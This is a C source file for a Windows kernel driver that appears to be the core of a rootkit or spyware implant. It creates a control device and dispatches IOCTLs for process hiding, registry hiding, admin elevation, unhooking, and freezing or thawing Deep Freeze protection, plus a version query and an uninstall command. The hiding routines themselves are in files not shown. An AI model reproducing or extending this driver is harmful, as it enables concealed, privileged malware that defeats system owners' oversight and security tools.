CORE_Driver/main.c
#include "ntddk.h"
#include "driver.h"
#include "hiding.h"
#include "deepfreeze.h"
#include "hiding.h"
#include "version.h"
#include "main.h"
// nome del device principale a cui mandare le IOCTL
const WCHAR dev_name[] = NT_CONTROL_DEVICE;
const WCHAR dev_link[] = DOS_CONTROL_DEVICE;
PDEVICE_OBJECT g_driver_device;
NTSTATUS do_ioctl_version(IN PDEVICE_OBJECT dobj, IN PIRP Irp, IN PIO_STACK_LOCATION irpSp)
{
if (irpSp->Parameters.DeviceIoControl.OutputBufferLength < strlen(DRIVER_VERSION) + 1) {
Irp->IoStatus.Information = strlen(DRIVER_VERSION);
Irp->IoStatus.Status = STATUS_BUFFER_OVERFLOW;
return Irp->IoStatus.Status;
}
// reply with the version
memset(Irp->AssociatedIrp.SystemBuffer, 0, strlen(DRIVER_VERSION) + 1);
memcpy(Irp->AssociatedIrp.SystemBuffer, DRIVER_VERSION, strlen(DRIVER_VERSION));
Irp->IoStatus.Information = strlen(DRIVER_VERSION) + 1;
return STATUS_SUCCESS;
}
NTSTATUS DriverDispatchFunc(IN PDEVICE_OBJECT dobj, IN PIRP Irp)
{
PIO_STACK_LOCATION irpSp;
NTSTATUS ntstatus = STATUS_SUCCESS;
// route the IOCTL to the deepfreeze unhook device
if (dobj != g_driver_device)
return DispatchDeepFreeze(dobj, Irp);
irpSp = IoGetCurrentIrpStackLocation (Irp);
Irp->IoStatus.Information = 0;
if (irpSp->MajorFunction == IRP_MJ_DEVICE_CONTROL) {
switch (irpSp->Parameters.DeviceIoControl.IoControlCode) {
/************************************************************************/
/* HIDING RELATED IOCTL */
/************************************************************************/
case IOCTL_UNHOOK:
ntstatus = do_ioctl_unhook(dobj, Irp, irpSp);
break;
case IOCTL_ADDPID:
ntstatus = do_ioctl_addpid(dobj, Irp, irpSp);
break;
case IOCTL_ADMIN:
ntstatus = do_ioctl_admin(dobj, Irp, irpSp);
break;
case IOCTL_REG:
ntstatus = do_ioctl_reg(dobj, Irp, irpSp);
break;
/************************************************************************/
/* DEEPFREEZE RELATED IOCTL */
/************************************************************************/
case IOCTL_THAW:
ntstatus = do_ioctl_thaw(dobj, Irp, irpSp);
break;
case IOCTL_FREEZE:
ntstatus = do_ioctl_freeze(dobj, Irp, irpSp);
break;
/************************************************************************/
/* GENERAL PURPOSE */
/************************************************************************/
case IOCTL_VERSION:
ntstatus = do_ioctl_version(dobj, Irp, irpSp);
break;
case IOCTL_UNINST:
ntstatus = do_ioctl_uninstall(dobj, Irp, irpSp);
break;
default:
DTRACE("DriverDispatchFunc - Unknown IOCTL code [%.8X]", irpSp->Parameters.DeviceIoControl.IoControlCode);
break;
}
}
Irp->IoStatus.Status = ntstatus;
IoCompleteRequest (Irp, IO_NO_INCREMENT);
return ntstatus;
}
NTSTATUS OnUnload( IN PDRIVER_OBJECT dobj )
{
UNICODE_STRING dev_link_unicode;
OnUnloadHiding(dobj);
OnUnloadDeepFreeze(dobj);
RtlInitUnicodeString(&dev_link_unicode, dev_link);
// Cancella il link che avevamo creato
IoDeleteSymbolicLink(&dev_link_unicode);
IoDeleteDevice(g_driver_device);
DTRACE("OnUnload END");
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT dobj, IN PUNICODE_STRING regpath)
{
UNICODE_STRING dev_name_unicode;
UNICODE_STRING dev_link_unicode;
NTSTATUS nt_status;
int i;
DTRACE("DriverEntry called");
for(i=0; i<=IRP_MJ_MAXIMUM_FUNCTION; i++)
dobj->MajorFunction[i] = DriverDispatchFunc;
dobj->DriverUnload = OnUnload;
// Crea il device per le ioctl
RtlInitUnicodeString(&dev_name_unicode, dev_name);
RtlInitUnicodeString(&dev_link_unicode, dev_link);
nt_status = IoCreateDevice(dobj, 0, &dev_name_unicode, FILE_DEVICE_H4DRIVER, 0, FALSE, &g_driver_device);
if ( NT_SUCCESS(nt_status) )
nt_status = IoCreateSymbolicLink(&dev_link_unicode, &dev_name_unicode);
else {
DTRACE("IoCreateDevice returned [%X]", nt_status);
return nt_status;
}
DTRACE("IoCreateSymbolicLink %x", nt_status);
// call each driverEntry function if the specific parts
// have to perform some operation on load
DriverEntryHiding(dobj, regpath);
DriverEntryDeepFreeze(dobj, regpath);
return STATUS_SUCCESS;
}
// Dumps a memory region to debug output
void DumpMemory (void *mem, int size)
{
unsigned char str[20];
unsigned char *m = mem;
int i,j;
for (j = 0; j < size / 8; j++)
{
memset (str,0,sizeof str);
for (i = 0; i < 8; i++)
{
if (m[i] > ' ' && m[i] <= '~')
str[i]=m[i];
else
str[i]='.';
}
DTRACE ("0x%08p %02x %02x %02x %02x %02x %02x %02x %02x %s\n",
m, m[0], m[1], m[2], m[3], m[4], m[5], m[6], m[7], str);
m+=8;
}
}